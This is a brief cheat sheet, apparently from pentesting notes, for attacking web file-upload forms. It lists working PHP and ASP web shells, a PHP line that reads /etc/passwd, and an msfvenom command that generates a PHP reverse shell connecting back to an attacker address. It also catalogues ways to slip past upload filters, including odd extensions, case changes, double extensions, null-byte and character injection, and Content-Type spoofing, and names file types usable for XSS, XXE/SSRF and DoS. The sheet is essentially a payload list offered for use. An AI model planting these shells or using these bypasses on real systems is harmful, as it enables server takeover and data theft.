Related Sites:
Upload Insecure Filesarrow-up-right
<?php file_get_contents('/etc/passwd'); ?>
Basic PHP File Read
<?php system('hostname'); ?>
Basic PHP Command Execution
<?php system($_REQUEST['cmd']); ?>
Basic PHP Web Shell
<% eval request('cmd') %>
Basic ASP Web Shell
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
Generate PHP reverse shell
PHP Web Shellarrow-up-right
PHP Web Shell
PHP Reverse Shellarrow-up-right
PHP Reverse Shell
Web/Reverse Shellsarrow-up-right
List of Web Shells and Reverse Shells
Client-Side Bypass
[CTRL+SHIFT+C]
Toggle Page Inspector
Blacklist Bypass
shell.phtml
Uncommon Extension
shell.pHp
Case Manipulation
PHP Extensionsarrow-up-right
List of PHP Extensions
ASP Extensionsarrow-up-right
List of ASP Extensions
Web Extensionsarrow-up-right
List of Web Extensions
Whitelist Bypass
shell.jpg.php
Double Extension
shell.php.jpg
Reverse Double Extension
%20, %0a, %00, %0d0a, /, .\, ., β¦
%20
%0a
%00
%0d0a
/
.\
.
β¦
Character Injection - Before/After Extension
Content/Type Bypass
Web Content-Typesarrow-up-right
List of Web Content-Types
Content-Typesarrow-up-right
List of All Content-Types
File Signaturesarrow-up-right
List of File Signatures/Magic Bytes
XSS
HTML, JS, SVG, GIF
XXE/SSRF
XXE
SSRF
XML, SVG, PDF, PPT, DOC
DoS
ZIP, JPG, PNG
Last updated 11 months ago